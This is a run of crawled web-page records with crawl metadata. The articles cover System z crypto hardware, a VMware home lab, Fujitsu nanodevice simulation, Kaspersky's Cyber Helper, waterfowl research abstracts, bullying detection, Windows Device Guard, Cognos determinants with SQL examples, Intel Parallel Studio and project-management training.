cryptographic hardware features of the System z architecture using a simple Java program for encrypting and decrypting a message using the Advanced Encryption Standard (AES). However, let’s first briefly describe the cryptographic hardware features supported by the System z platform and the software stack needed to exploit these features in a Java program. System z Cryptographic Hardware The System z architecture provides CPACF on its processors, which is a free installation option for all System z servers in countries that aren’t subject to U.S. export regulations for cryptography. CPACF provides instructions that compute hash functions (SHA-1, SHA-224, SHA-256, SHA-386 and SHA-512), cryptographic functions to encrypt or decrypt messages using Data Encryption Standard (DES), triple DES, AES-128, AES-192 and AES-256 using several modes of operations (ECB, CBC, CFB, OFB, CTR, XTS, CCM and GCM), support for message authentication codes such as CBC-MAC, CMAC and GMAC, and a pseudo random generator. Depending on the size of the message to be encrypted, some modes of operation implemented in CPACF are more than 10 times faster than software implementations. Crypto Express Adapters support offloading cryptographic functions to an adapter card, freeing the CPUs to perform other work. Linux can exploit Crypto Express Adapters both in accelerator mode, identified as CEX2A, CEX3A and CEX4A, and coprocessor mode, identified as CEX2C, CEX3C and CEX4C. Crypto Express Adapters in accelerator mode and coprocessor mode provide functions for RSA clear key encryption and decryption with the accelerators, providing better performance than the coprocessors. In addition, the Crypto Express coprocessors provide a true random number generator and functions for secure key cryptography, according to the Common Cryptographic Architecture (CCA). With clear key cryptography, cryptographic keys are stored in memory. With secure key cryptography, all keys stored in memory are encrypted. These keys can only be decrypted and used to encrypt or decrypt messages inside a tamper-proof Hardware Security Module (HSM) such as the Crypto Express coprocessors. It can be addressed using an API defined in the CCA. Figure 1 shows the use of both clear key and secure key cryptography. The Linux Crypto Software Stack The crypto software stack in this example is required for a Java application to exploit cryptographic hardware; it consists of three layers:
<urn:uuid:2e45cebb-396c-4819-89ce-e15caa81913f>
CC-MAIN-2017-04
http://enterprisesystemsmedia.com/article/using-crypto-hardware-with-java-in-linux-on-system-z
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00092-ip-10-171-10-70.ec2.internal.warc.gz
en
0.874438
895
2.671875
3
Building a Home Lab for VMware vSphere 6.0 This paper will discuss how to (relatively) inexpensively setup a simulated lab environment using VMware (the latest version). This white paper is broken down into three major sections; the first and most detailed is about the hardware required, the second is about the VMware Workstation configuration, and the third is about installing vSphere (ESXi) 6.0 and Virtual Center (VC). Before virtualization, I had many computers around my house that required maintenance, upgrading, replacement, etc., as well as the power to run all of the equipment. This was very time-consuming and expensive. In 1999, I began using VMware Workstation 2.0 to create virtual machines (VMs) to study NetWare, NT 4.0, Windows 2000, etc. Since that time, I have used it in all of my studies and reduced my lab equipment to one computer, a powerful laptop. Originally, Elastic Sky X (ESX) didn't run in a VM, requiring more hardware to study and learn ESX. As of ESX 3.5 and Workstation 6.5.2, it is possible to virtualize ESX in a Workstation VM (or inside a vSphere server, for that matter, but we won't be discussing that in this white paper), although this required workarounds and was not supported. It is possible to run ESXi 6.0 inside of ESXi 6.0 or VMware Workstation 8.0 or higher. In fact, VMware and Global Knowledge teach their vSphere 6.0 courses in this manner (running ESXi inside ESXi). Using ESXi as the host virtualization platform works, but it requires a dedicated machine. This is often possible in a business setting, but may be difficult for the small business or in circumstances where spare hardware is not available. Hence, this white paper will discuss how to use Workstation 11.0 (the latest version) to create the simulated environment. I often get asked by my students how to (relatively) inexpensively setup this kind of lab for study after class, and the result is this white paper. When specific vendors are mentioned, it is not an endorsement, but rather just an example of something that I have used and know works. This white paper is broken down into three major sections; the first and most detailed is about the hardware required, the second is about the VMware Workstation configuration, and the third is about installing vSphere (ESXi) 6.0 and Virtual Center (VC). Note that this white paper is not intended to be an in-depth review of how to install and configure vSphere as that is taught in the VMware classes and a VMware class is required for certification. The biggest question is whether to build your lab at a stationary location, such as in your home or on a spare server at work, or whether it needs to be portable. In many cases, a stationary configuration is sufficient, so the desktop/server route works well and is usually less expensive. If you need to do demonstrations for customers, study at multiple locations, etc., then a laptop configuration may work better for you, though it will cost more for a similar configuration. As far as minimum central processing unit (CPU) requirements are concerned, you'll need at least two cores (or CPUs) to be able to install ESXi and/or VC, but this will be very slow. I suggest a minimum of 4 cores (or CPUs, preferably hyperthreaded) so there is enough CPU power to run the VMs and the host operating system (OS). Eight or more cores work well. If you're planning on creating and using input/output (I/O)-intensive VMs, and/or running many VMs, and/or doing a lot on the host OS while VMs are running, you should consider more than 12 cores. Remember that ESXi 6.0 (vSphere 6.0) requires 64-bit-capable CPUs to run, so be sure to purchase 64-bit-capable CPUs with either Intel virtualization technology (VT) or Advanced Micro Dynamics virtualization (AMD-V) support (both physically on the CPU and enabled in the basic input/output system [BIOS]). I point this out not because you are likely to purchase a decade-old computer that doesn't have a 64-bit CPU, but rather that the virtualization extensions in the processor may not be made available via the BIOS. ESXi also requires the No Execute/Execute Disable (NX/XD) feature to be enabled in the BIOS.
<urn:uuid:d398d033-5458-4931-9d58-d273b06e48f4>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/building-a-home-lab-for-vmware-vsphere-60/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00330-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938846
946
2.53125
3
The research division of Fujitsu has used advanced supercomputing techniques to successfully simulate the electrical properties of a 3,000-atom nano device, a threefold increase from previous research. The company notes that at the nanoscale level, minute differences in the local atomic configuration can have a major impact on the electrical properties of a device. The challenge is such that it requires the first-principles method of calculation to accurately calculate the behavior of each atom. This method determines physical properties from the basic laws of quantum mechanics that govern atoms and electrons. Computational simulation is well regarded for supporting a development process that is faster and more cost-effective than physical experimentation. But in this case, there’s a catch. When the first-principles method is applied to electrical property forecasting, the computations involved are so large that forecasts are generally limited to the order of 1,000 atoms. At this scale, only channel regions – the pathways for electricity – are able to be calculated. A more desirable simulation will incorporate interactions with thousands of adjacent electrodes and insulators – which are understood to greatly affect electrical properties. Until now, this has been considered an intractable problem. Fujitsu Labs came up with a new technique based on massively-parallel supercomputing technology developed by the Japan Advanced Institute of Science and Technology (JAIST) and the Computational Material Science Initiative (CMSI). The new calculation technique reduces memory requirements while maintaining precision. With this approach, it is possible to calculate the electrical properties, not only of individual nano device components, but of the interactions between these components. The advancements have already enabled a successful 3,000 atom scale application, and the researchers anticipate that this development will make way for faster practical implementations of nano devices. As silicon-based devices come against the limits of miniaturization, there is increased interest in developing new materials and types of structures that can increase speed and energy-efficiency. Nanotechnology offers a promising path to sustaining Moore’s Law-type returns. “This technology, being capable of modeling the electrical properties of a 3,000-atom nano device, was used to discover the electrical properties of a nano device that included interactions with its environment, making a significant step toward the design of new nano devices,” notes the official release announcement. As ever-more massive parallel computing technology and more performant supercomputers become available, Fujitsu will continue to experiment with larger-scale and more efficient calculations. Going forward, Fujitsu is pursuing nano device design through total simulations of nano devices at the 10,000 atom scale.
<urn:uuid:514391e0-f2f7-4840-a987-6268d3bfda55>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/01/21/fujitsu-simulates-3000-atom-nano-device/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00542-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910638
532
3.078125
3
Cyber Helper, artificial intelligence, developed by Kaspersky Lab in 2009, is designed to automate the process of combating malware. Cyber Helper includes several autonomous subsystems capable of data exchange and interoperability. It also contains several ‘hard’ algorithms and rules which are used in standard programs. However, most of its subsystems utilize artificial intelligence and fuzzy logic and independently define their own behavior as they go about solving different tasks. The main task facing those developing artificial intelligence is to create an autonomous AI device fully capable of learning, making informed decisions and modifying its own behavioral patterns in response to external stimuli. In most cases artificial intellect is based upon experience and knowledge provided by humans in the form of behavioral examples, rules or algorithms, which means it is not very effective at meeting the challenges of modern computer virology. With Cyber Helper the aim was to create a self-learning system capable of conducting independent research and accumulating knowledge and experience. As a result, the system not only learns but, based on its knowledge and the result of its own analysis of an object, periodically finds errors in the analyst’s work. In such cases, the Cyber Helper may start by interrupting the analytical and decision-making process and send a warning to the expert before going on to block the scripts that are to be sent to the user, which from the system’s perspective could harm the user’s computer. The simplest example of such a mistake might be when a malware program substitutes an important system component. On the one hand it is necessary to destroy the malware program, while on the other; to do so may result in irrecoverable system damage. At the heart of the Cyber Helper system is a utility called AVZ that was created to automatically collect data from potentially infected computers and store it in machine-readable form for use by other subsystems as well as perform actions on a remote computer using universal scripts. The utility generates reports in HTML and XML formats. From 2008 onwards, the core AVZ program has been integrated into Kaspersky Lab’s antivirus solutions and can be used for infection treatment if necessary. “Modern malware programs act and propagate extremely fast. In order to respond immediately, the intelligent processing of large volumes of non-standard data is required,” says Oleg Zaitsev, the developer behind Cyber Helper and Chief Technology Expert at Kaspersky Lab. “Artificial intelligence is ideally suited to this task; it can process data far in excess of the speed of human thought. Cyber Helper is one of only a handful of successful attempts to get closer to the creation of autonomous artificial intelligence. The main advantage of Cyber Helper is that, like an intelligent creature, it is able to self learn and define its own actions in an independent manner.” You can find out more by reading the article “Cyber Expert: Artificial Intelligence in the Realms of IT Security” at www.serurelist.com/en.
<urn:uuid:536387c3-783f-48e8-99f2-9c0a196ddef3>
CC-MAIN-2017-04
http://www.kaspersky.com/au/about/news/virus/2010/Artificial_Intelligence_in_the_Realms_of_IT_Security
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00568-ip-10-171-10-70.ec2.internal.warc.gz
en
0.935102
613
3.34375
3
Humburg D.D.,Ducks Unlimited Inc. | Anderson M.G.,Institute for Wetland and Waterfowl Research Wildfowl | Year: 2014 The North American Waterfowl Management Plan (NAWMP) is a continental ecosystems model for wildlife conservation planning with worldwide implications. Since established in 1986, NAWMP has undergone continual evolution as challenges to waterfowl conservation have emerged and information available to support conservation decisions has become available. In the 2012 revision, the waterfowl management community revisited the fundamental basis for the Plan and placed greater emphasis on sustaining the Plan's conservation work and on integration across disciplines of harvest and habitat management. Most notably, traditional and nontraditional users (i.e. hunters and wildlife viewers) of the resource and other conservation supporters are integrated into waterfowl conservation planning. Challenges ahead for the waterfowl management enterprise include addressing tradeoffs that emerge when habitat for waterfowl populations versus habitat for humans are explicitly considered, how these objectives and decision problems can be linked at various spatial and temporal scales, and most fundamentally how to sustain NAWMP conservation work in the face of multi-faceted ecological and social change. © Wildfowl & Wetlands Trust. Source Plattner D.M.,Southern Illinois University Carbondale | Eichholz M.W.,Southern Illinois University Carbondale | Yerkes T.,Ducks Unlimited Inc. Journal of Wildlife Management | Year: 2010 A bioenergetic approach has been adopted as a planning tool to set habitat management objectives by several United States Fish and Wildlife Service North American Waterfowl Management Plan Joint Ventures. A bioenergetics model can be simplified into 2 major components, energetic demand and energetic supply. Our goal was to estimate habitat-specific food availability, information necessary for estimating energy supply for black ducks (Anas rubripes) wintering on Long Island, New York, USA. We collected both nektonic and benthic samples from 85 wetland sites dispersed among 5 habitat types (salt marsh, mud flat, submersed aquatic vegetation, brackish bay, and freshwater) commonly used by black ducks in proportion to expected use. Biomass varied among habitats (F4,5 > 7.46, P < 0.03) in 20042005, but there was only marginal variation in 20052006 (F3,4 =5.75, P =0.06). Mud flats had the greatest biomass (1,204 kg/ha, SE 532), followed by submersed aquatic vegetation (61 kg/ha, SE 18), and salt marsh (34 kg/ha, SE =6). In the second year of the study, freshwater had the greatest biomass (306 kg/ha, SE =286), followed by mud flats (85 kg/ha, SE =63), and salt marsh (35 kg/ha, SE =4). Our results suggest food density on wintering grounds of black ducks on coastal Long Island is considerably lower than for dabbling ducks using inland freshwater habitats, indicating black duck populations are more likely than other species of dabbling ducks to be limited by winter habitat. We recommend targeting preservation, restoration, and enhancement efforts on salt marsh habitat. © 2010 The Wildlife Society. Source Smith A.,Ducks Unlimited Inc. Journal of Spatial Science | Year: 2010 This paper describes an approach to using the Random Forest classification algorithm to quantitatively evaluate a range of potential image segmentation scale alternatives in order to identify the segmentation scale(s) that best predict land cover classes of interest. The image segmentation scale selection process was used to identify three critical image object scales that when combined produced an optimal level of land cover classification accuracy. Following segmentation scale optimization, the Random Forest classifier was then used to assign land cover classes to 11 scenes of SPOT satellite imagery in North and South Dakota with an average overall accuracy of 85.2 percent. © 2010 Surveying and Spatial Sciences Institute and Mapping Sciences Institute, Australia. Source Peron G.,Colorado State University | Peron G.,U.S. Geological Survey | Walker J.,Ducks Unlimited Inc. | Rotella J.,Montana State University | And 2 more authors. Ecology | Year: 2014 Birds and their population dynamics are often used to understand and document anthropogenic effects on biodiversity. Nest success is a critical component of the breeding output of birds in different environments; but to obtain the complete picture of how bird populations respond to perturbations, we also need an estimate of nest abundance or density. The problem is that raw counts generally underestimate actual nest numbers because detection is imperfect and because some nests may fail or fledge before being subjected to detection efforts. Here we develop a state-space superpopulation capture-recapture approach in which inference about detection probability is based on the age at first detection, as opposed to the sequence of re-detections in standard capture-recapture models. We apply the method to ducks in which (1) the age of the nests and their initiation dates can be determined upon detection and (2) the duration of the different stages of the breeding cycle is a priori known. We fit three model variants with or without assumptions about the phenology of nest initiation dates, and use simulations to evaluate the performance of the approach in challenging situations. In an application to Blue-winged Teal Anas discors breeding at study sites in North and South Dakota, USA, nesting stage (egg-laying or incubation) markedly influenced nest survival and detection probabilities. Two individual covariates, one binary covariate (presence of grazing cattle at the nest site), and one continuous covariate (Robel index of vegetation), had only weak effects. We estimated that 5-10% of the total number of nests were available for detection but were missed by field crews. An additional 6-15% were never available for detection. These percentages are expected to be larger in less intense, more typical sampling designs. User-friendly software nestAbund is provided to assist users in implementing the method. © 2014 by the Ecological Society of America. Source Lindberg M.S.,University of Alaska Fairbanks | Schmidt J.H.,National Park Service | Walker J.,Ducks Unlimited Inc. Journal of Wildlife Management | Year: 2015 We examined changes in the pathways used for inference in The Journal of Wildlife Management (JWM) and 2 other applied journals during recent decades. Although null hypothesis significance testing is still the main approach to inference, use of information-theoretic approaches based on Akaike's Information Criterion (AIC) has rapidly grown to be a common form of inference in JWM and related journals. We observed little growth in the use of other information criteria such as Bayesian Information Criterion (BIC). The use of information criteria for multimodel inference has addressed some of the criticisms of significance testing. However, information criteria still needs to be used appropriately with a priori hypotheses to be valid. In addition, much work remains to be done on application of information criteria to more complex models such as hierarchical and Bayesian models. © 2015 The Wildlife Society. Source
<urn:uuid:31388a6b-a67b-4e18-9a1e-b9e42e6b6b33>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/ducks-unlimited-inc-293102/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00505-ip-10-171-10-70.ec2.internal.warc.gz
en
0.900468
1,481
2.703125
3
Computers may soon be able to police online chat rooms and social networking sites for signs of bullying, flaming and negative comments. - Taking online emotional temperatures - Positive, neutral and negative ways of expressing emotions - Improving the future of social networking - Full list of collaborators Work by a consortium of European universities and research organisations aims to develop software capable of taking the emotional temperature of online postings in Myspace and other internet communities. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. The same technology could be used for improving the way computer systems respond to human queries, allowing them to respond differently according to whether users are frustrated or happy. Professor Mike Thelwall, professor of information science at the university of Wolverhampton, is spearheading the UK's contribution to the project. The university has developed software capable of taking the emotional temperature of postings on social networking sites. The group is using sample data from Myspace, but the principles could be applied to any site. "The challenging thing has been tailoring something that ought to work in theory for the way it works in Myspace." he says. "For example, in normal text you could look for the word "happy", but in Myspace it might be happy with seven a's. We have to recognise that happy with seven a's means happy and that it is more positive than happy with one a." After three months' development work, the software is able to assess the emotional content of postings with an accuracy of 60% - as good as a human reader. "We were surprised by the sheer volume of positive emotion in Myspace and how little negative emotion there was. Especially among male users, insulting your friends is something you do, but that does not seem to go on in Myspace," Thelwall says. The four-year project aims to analyse and understand the emotional dynamics of people interacting online. The work could help to improve the design of social networking sites in the future. "We have simulation experts that will simulate how emotions flow around the system. If one person is very positive, how will that flow around the system? If one person is very negative, what impact will that have? It might be that some negative comments are necessary to keep a system alive, as negative comments can generate debate," he says. Ultimately, the work may lead to software that can take the emotional temperature of comments on social networking sites in real time. One problem is that a comment made as a joke online could be taken the wrong way by others. Offenders could either be sent an automatic warning or be referred to a moderator, says Thelwall. "Expressing a negative emotion in a chat room can have serious consequences because so many young people are online," he says. "Hopefully the software will detect if someone is being bullied or flamed." Part of the work will be to assess the impact that emotional statements have on individuals using online services. For example, researchers plan to use electrodes to measure volunteers' responses to positive and negative comments in chat rooms. "We are going to try to extend our methods to work with lots of other types of internet discussions," he says.
<urn:uuid:c9d412d5-b78c-471f-abe3-36cf31028a47>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280096914/Computers-can-detect-bullying-on-social-networking-sites
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00231-ip-10-171-10-70.ec2.internal.warc.gz
en
0.95138
669
3.109375
3
Cyber-attacks commonly occur through applications, browsers, un-patched vulnerabilities, or social-engineering. Deploying Device Guard (a central feature in the suite of Microsoft’s Windows 10 security features) does not eliminate the possibility of being targeted for attacks, but it does significantly reduce the attack surfaces favored by bad actors and malware writers. What Device Guard does is harden those various attack surfaces by creating a “chain of trust” from the hardware and firmware configuration involved with the boot process, up through the Windows OS kernel and to software running in Windows. The aim is to ensure all components involved are trusted and have not been compromised or tampered with at any time. This is called defense in-depth security: the endpoint is secured in multiple layers rather than focusing on just one layer and ignoring others. However, Deploying Device Guard is no cup of tea, nor for the faint of heart. There are a number of components in its architecture and detailed processes to follow. Learning more about Device Guard is sure to present some new concepts in Windows that are worth taking the time to understand. In this white paper, which I have co-authored with Dave Fuller, we not only give readers a greater understanding of how Device Guard works, but – much more importantly – explain how you can implement it, and develop your ‘whitelist’ of trusted applications. It’s a real must-read for anyone aiming for a secure Windows 10 for their business.
<urn:uuid:6bc7a558-e521-45b9-93a1-62c7aee56ba2>
CC-MAIN-2017-04
https://www.1e.com/blogs/2016/06/24/white-paper-deploying-device-guard/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00047-ip-10-171-10-70.ec2.internal.warc.gz
en
0.957165
304
2.59375
3
Determinants can play a crucial role in the overall performance and consistency of your Framework Manager model but remain one of the most confusing aspects of the application to most developers. This article will attempt to end the confusion. Determinants are used so that a table of one grain (level of detail) behaves as if it were another actually stored at another grain. They are primarily used for dimension tables where fact tables join to dimension tables at more than one level in the dimension. (There are other cases where you could use them, but they are less common and fairly specific situations.) Let’s use the example of a date dimension table with day level grain. If all the fact tables join at the day level, the most detailed level, then you do not need determinants. But as many of us know from experience, this is not always the case. Fact table are often aggregated or stored at different levels of granularity from a number of reasons. The trouble arises when you wish to join to the dimension table at a level that is not the lowest level. Consider a monthly forecast fact table which is at the month level of detail (1 row per month). A join to the month_id (e.g. 2009-12) would return 28 to 31 records (depending on the month) from the date dimension, and throw off the calculations. Determinants solve this problem. Often when modeling, it’s useful to think about the SQL code you would like to generate. Without determinants, the incorrect SQL code would look something like this. FROM SALES_FORECAST F INNER JOIN DATE_DIM D ON F.MONTH_ID = D.MONTH_ID This code will retrieve up to 31 records for each of the sales forecast records. Applying mathematical functions, for example Sum and Count, would produce an incorrect result. What you would like to generate is something along the following lines, which creates a single row per month, AND THEN join to the fact table. FROM SALES_FORECAST F INNER JOIN ( SELECT DISTINCT FROM DATE_DIM D ) AS D1 ON F.MONTH_ID = D1.MONTH_ID As shown above, the trick is to understand which columns in the dimension table are related to the month_id, and therefore are unique along with the key value. This is exactly what determinants do for you. Unraveling the Mystery in Framework Manager Following Cognos best practices, determinants should be specified at the layer in the model in which the joins are specified. Here we see a date dimension with 4 levels in the dimension, Year, Quarter, Month and day level. This means we can have up to 4 determinants defined in the query subject depending on the granularity of the fact tables present in your model. The first three levels, Year, Quarter, Month, should be set to “group-by” as they do not define a unique row within the table and Framework Manager needs to be made aware that the values will need to be “Grouped” to this level. In other words, the SQL needs to “group by” a column or columns in order to uniquely identify a row for that level of detail (such as Month or Year). The Day level (often called the leaf level) should be set to “Uniquely Identified”, as it does uniquely identify any row within the dimensional table. While there can be several levels of “group by” determinants, there is typically only one uniquely identified determinant, identified by the unique key of the table. The “uniquely identified” determinant by definition contains all the non-key columns as attributes, and is automatically set at table import time, if it can be determined. The Key section identifies the column or columns which uniquely identify a level. Ideally, this is one column, but in some cases may actually need to include more than one column. For example, if your Year and Month values (1-12) are in separate columns. In short, the key is whatever columns are necessary to uniquely identify that level. Using our aforementioned table, the setup would look like this: The Attributes section identifies all the other columns which are distinct at that level. For example, at a month_id (e.g. 2009-12) level , columns such as month name, month starting date, number of days in a month are all distinct at that level. And obviously items from a lower level, such as date or day-of-week, are not included at that level. Technically, the order of the determinants does not imply levels in the dimension. However, columns used in a query are matched from the top down which can be very important to understanding the SQL that will be generated for your report. If your report uses Year, Quarter and Month, the query will group by the columns making up the Year-key, Quarter-key and Month-key. But if the report uses just Year and Month (and not the Quarter) then the group by will omit the Quarter-key. How Many Levels Are Needed? Do we need all 4 levels of determinants? Keep in mind that determinants are used to join to dimensions at levels higher than the leaf level of the dimension. In this case, we’re joining at the month level (via month_id). Unless there are additional joins at the year or quarter level, we do not strictly need to specify those determinants. Remember that year and quarter are uniquely defined by the month_id as well, and so should be included as attributes related to the month, as shown. Following these simple steps the following SQL will be generated for your report. The highlighted section is generated by the determinant settings. Notice how it groups by the Month_ID, and uses the min function to guarantee uniqueness at that level. (No, it doesn’t trust you enough to simply do a SELECT DISTINCT.) The second level of group by is the normal report aggregation by report row. So the result is that the join is done correctly, which each monthly fact record joined to 1 dimensional record at the appropriate level, to produce the correct values in the report.
<urn:uuid:fe468e28-027d-4078-b5ea-338aec5d7e08>
CC-MAIN-2017-04
https://www.ironsidegroup.com/2010/02/01/determinants-the-answer-to-a-framework-manager-mystery/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00313-ip-10-171-10-70.ec2.internal.warc.gz
en
0.899471
1,307
2.625
3
There are a set of factors creating the environment where Microsoft and mainstream parallel computing come face to face, so there is a need to ensure that a robust and workable bridge exists between the two. That was the basis underpinning the recent Intel Parallel Computing Conference in Salzburg. On the hardware side the factors are the multicore processors from the likes of Intel and AMD. Now all servers sold by the major vendors have four-core processors as standard, which means that, as the server upgrade cycle drifts through the user base, even the smallest user is equipped for a measure of parallel computing. With six-core devices coming available at the server high-end, and eight-core coming next year, the next 12 months will see the parallel processing performance of bog-standard servers expand significantly. And that is just in the traditional x86-architecture environment. There is widespread speculation and experimentation about the potential of so-called 'manycore' specialist devices such as Nvidia's graphics processor. These devices, with 32 or more cores per processor, are seen as a powerful alternative platform option capable of running mainstream business services and applications for those users looking to take the parallel route seriously. Intel is well aware of this potential as it is already talking openly about its own up-coming graphics chip, codenamed Larrabee, as a contender for mainstream parallel processing as well. Published simulation results suggest this will have up to 32 x86 architecture cores available to start with. On the software side Microsoft is a major player in the mainstream of business applications and operating systems and, while there has to be some doubts about its current capabilities at supporting and exploiting the potential of parallelism, neither the company nor Intel are going to ignore the need for new tools to help applications developers move towards parallelism with both new applications and the adaptation of legacy ones. The need is, after all, already growing fast as eight-core processors—and the potential of 32-core Larrabee devices—arrive next year. It fell to James Reinders, Intel's Chief Software Evangelist and Director of Software Development Products, to outline the new package of development tools the company has brought together to help applications developers maximise the productivity of parallelizing C++ applications using Visual Studio on Windows. Intel already has a suite of development tools for developing C++ and Fortran applications on Linux and MacOS, such as the MPI Library, Cluster Toolkit, Thread Checker, VTtune and the Math Kernal Library. Reinders describes these as tools for experts, and now the need is for tools that meet the needs of the rest of the world. This is the objective behind the new packaged set of tools, Parallel Studio, that Intel is formally introducing on May 26th. This integrates the updated existing tools with Visual Studio-related additions in a fully integrated package. According to Reinders, all tools in parallel applications development need to address two aspects—helping with correctness and with scaling. They should also provide the appropriate level of abstraction so that issues like maintainability and future proofing are ensured. This is important, particularly in the mainstream where operating systems, language compilers and applications code needs to demonstrate a degree of platform independence as upgraded hardware is introduced. Parallel Studio helps with these important development issues, helping Microsoft developers from the start point of applications design—where to start parallelizing—through to the tuning of the final program. Everything plugs in with Visual Studio 'very tightly', according to Reinders. There are a number of Visual Studio-specific component tools included in Parallel Studio. Parallel Composer provides the coding and debug capabilities, with an optimised C++ compiler. It can also invoke Integrated Performance Primitives directly from the math library component as well as supporting Lambda Functions. Parallel Inspector helps with determinism issues such as data races or dead locks. This is an updated version of Intel Thread Checker that includes a memory checker that can handle threading in a parallel environment. This is designed to help identify problem areas with parallelising existing applications that have worked OK serially, but don't work in a parallel environment because of memory problems. It is particularly useful for identifying memory leaks and threading errors, which can be a real problem in parallelising applications. As well as identifying the source of threading problem it also locates and displays the relevant source code. Parallel Amplifier is designed to identify bottlenecks and can show what it is in the source code that is causing the problem. It can also show where locks—used to ensure function synchronisation in parallel applications—are in practice causing delays. It can also scale performance by using additional cores. This is expected to be very useful for the applications tuning phase, as it can generate a wide range of statistics and analysis, such as identifying differences that might occur with multiple runs. A short term goal with Amplifier is its ability to help make applications run faster on multicore platforms by helping developers work out how the application will perform and identify potential trouble spots in advance. This is achieved with analysis tools for hot spot analysis, which finds where the application is spending too much time; locks and waits analysis, which identifies where bottlenecks exist; and concurrency analysis, which determines where and when cores are idle. According to Reinders, concurrency analysis should be particularly useful for helping to move serial code to parallel and keep it effective. Most of these tools work on AMD processors just as well as on Intel, though Reinders did state that this was not always the case for Parallel Amplifier because of the way that has been optimised to work with Intel processors. At the first upgrade of Parallel Studio, probably later this year, Intel will be adding Parallel Advisor, though, in an interesting marketing tactic, the plan is to have a 'lite' version of the tool available with the initial launch. This will be aimed at helping developers think parallel and help them work out which is the best way to implement parallelism in their applications. According to Reinders, it will do this by providing some 'what if' analysis on what happens if parallelism used 'here' and 'in this way'. The objective is to use Advisor as part of the initial design phase, to help developers identify possible problem areas such as data races before the coding phase starts. This will be available to purchasers of Parallel Studio, but not to purchasers of the individual tools for other platforms. Intel is, of course, not pursuing this track alone, and Microsoft has got a new version of Visual Studio (VS 2010) specifically for parallel systems on the stocks. This has already reached the community technology preview stage, and should be available in beta by mid-year. Reinders was, however, keen to point out that Parallel Studio is better than Visual Studio 2010, not least because it supports multiple versions of Visual Studio—and because it is available now. The support for multiple versions of Visual Studio is obviously important, in that Microsoft's approach is inevitably geared to providing parallelism in the next iteration of Visual Studio—therefore pushing developers towards an upgrade. The ability of Parallel Studio to work with existing versions of Visual Studio—2005, 2008 and the upcoming 2010—should allow developers to add parallelization capabilities while remaining on a development tool they know and understand. The existing toolset has not been forgotten in all this, with many of the enhancements developed for Parallel Studio being incorporated in the next upgrade. VTune will get new features in June, including key enhancements taken from Parallel Amplifier—though some of these are only expected to appear next year. Thread Checker will get enhancements taken from Parallel Inspector, and the Fortran and C++ compilers will continue to track standards.
<urn:uuid:e5223ace-0f2a-4cd4-bd84-99c13fc26d2b>
CC-MAIN-2017-04
http://www.bloorresearch.com/analysis/intels-parallel-studio-tools-to-parallelise-microsoft/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00221-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946552
1,571
2.5625
3
Teaching Project Management Skills Information technology is no longer just about creating a product; it’s also about managing the process of development. “The IT industry initially was operating more like a fly-by-night kind of operation,” said Hans Jonasson, senior instructor with ESI International. “There were a lot of studies in the ’80s and ’90s. One organization, The Standish Group, [looked] at the status of the software industry, and they found that less than one-third of all projects [were] successful. That was the wake-up call, and some people said, ‘Maybe it’s not enough to just sit down and program something. We have to make sure that we understand what a customer wants, what are the time frames, what are the business goals, and we have to organize [that] process.’” As a result, project management is a growing trend, and more organizations are expecting their IT professionals to have some experience in this area. Jonasson used the analogy of a vacation: You don’t just go on vacation. You have to plan and prepare. “You don’t just go down to the airport, buy the tickets and then see what happens,” he explained. “You do some research, you decide where you want to go, you plan, you get hotel rooms [and] you get your tickets. That’s really what project management is.” To teach the skills necessary for project management, trainers should use case studies or simulations in conjunction with lectures and discussions. “It’s critical because a lot of people learn by doing, and they learn [from] their mistakes,” Jonasson said. “[For example, if] I did this in my simulation or my application and people quit on me, why did that happen? To be able to analyze the impact of project management decisions, you [can’t] just do lecturing. You have to practice, you have to discuss [and] you have to analyze why you [made] these decisions and what other options did you have?” Teaching project management, though, is different from teaching technical skills. “When you do traditional technical training, there normally is a right answer and a wrong answer, so it’s relatively black-and-white,” Jonasson said. “In project management training, that is not the case. When you have a discussion, you get a question, [and] the answer is, ‘It depends.’ So it’s much more scenario-based.” For this reason, trainers who are teaching IT professionals about project management should do an icebreaker before class begins to get everyone loosened up. “IT people initially are a little bit hesitant in opening up, being open-minded, getting into the gray areas. So it’s important in the beginning of the class to do some team-building, icebreaker kinds of activities to get everyone comfortable,” Jonasson said. “If you just go in and do your lecture, you will lose them.” As with any training, it’s important to provide support after the session ends, too. “One of the things we do in ESI courses is have an action plan that students develop during the class where we look at what we have talked about in the class, what lessons have you learned and now how do you bring that back into your work environment?” Jonasson said. “Ideally, the students will meet back at work with their supervisors and say, ‘Here are some of the things we picked up in class; now how do we use that in our environment?’ Ongoing support within the organization when they get back from the classroom is critical.” - Lindsay Edmonds Wickman, firstname.lastname@example.org
<urn:uuid:10651539-a5f2-46d6-a569-af9be6bcc8c5>
CC-MAIN-2017-04
http://certmag.com/teaching-project-management-skills/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00129-ip-10-171-10-70.ec2.internal.warc.gz
en
0.95934
836
2.546875
3
